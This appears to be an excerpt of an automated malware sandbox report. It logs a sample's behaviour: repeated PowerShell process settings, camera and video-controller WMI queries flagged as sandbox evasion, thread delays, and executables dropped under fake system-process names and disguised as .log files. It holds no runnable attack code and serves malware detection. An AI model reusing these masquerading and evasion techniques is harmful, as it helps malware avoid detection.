                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1590000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1B040000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: C60000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: E90000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: EA0000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: 1ABB0000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: 1AD20000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 2600000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A600000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 13D0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 2770000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1410000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1B2C0000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: C40000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: 1140000 memory reserve | memory write watch
                              Source: C:\Recovery\xKVBpkhCEjg.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 7B0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 26E0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A6E0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: 970000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: 1A400000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeFile opened / queried: C:\Users\user\AppData\Local\Temp\a0w4buVmCi
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ModemLogs\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\xKVBpkhCEjg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 600000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599797
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599219
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 3600000
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2492
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2177
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2730
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2627
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2458
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 2519
                              Source: C:\Recovery\RuntimeBroker.exe, Window / User API: threadDelayed 9343
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\kZSUvzow.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\vNwKfKje.log
                              Source: C:\Recovery\RuntimeBroker.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\vlWcZFKy.log
                              Source: C:\Recovery\RuntimeBroker.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\SlQgWXuB.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\vEZKvYQi.log
                              Source: C:\Recovery\RuntimeBroker.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\pkWDNnmN.log
                              Source: C:\Recovery\RuntimeBroker.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\WgRxdDkv.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\mjoVvRUx.log
                              Source: C:\Recovery\RuntimeBroker.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\CjKcCUFn.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\UAuXMqPf.log
                              Source: C:\Recovery\RuntimeBroker.exe, Dropped PE file which has not been started: C:\Users\user\Desktop\cZuWGjpj.log
